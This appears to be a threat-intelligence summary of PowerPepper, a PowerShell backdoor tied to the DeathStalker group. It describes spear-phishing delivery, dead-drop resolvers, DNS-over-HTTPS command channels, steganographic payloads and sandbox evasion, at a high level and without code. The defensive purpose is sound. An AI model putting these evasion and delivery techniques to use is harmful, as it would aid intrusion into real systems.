PowerPepper is a Windows in-memory PowerShell backdoor that can execute remotely sent shell commands. It is associated with DeathStalker (formerly called Deceptikons), a threat actor know to be active since 2012. The threat actor consistently used what is called "dead-drop resolvers" (DDRs), which is an obfuscated content hosted on major public web services like YouTube, Twitter or Reddit, once decoded by malware this content reveals a command-and-control (C2) server address.
PowerPepper attacks starts with a spear-phishing email with attachments or a link to a public file sharing services or simply by a windos LNK (shortcut) file. When executed it downloads and runs a PowerShell-based implant named Powersing. It employs DNS over HTTPS (DoH) as a communications channel to transmit encrypted malicious shell commands from an attacker-controlled server.
PowerPepper also adds steganography to the list of evasion techniques, which is the practice of hiding data inside images. In this case, the malicious code is embedded in what appears to be regular pictures of ferns or peppers (hence the name), and it is then extracted by a loader script. The loader is disguised as a verification tool from identity services provider GlobalSign.
It uses custom obfuscation, with parts of its malicious delivery scripts hidden in Word-embedded objects. It will try to evade detection or sandboxes execution with various tricks such as detecting mouse movements, filtering the client’s MAC addresses, and adapting its execution flow depending on detected antivirus products.
PowerPepper Malspam Document Signatures
PowerPepper Malspam Document Download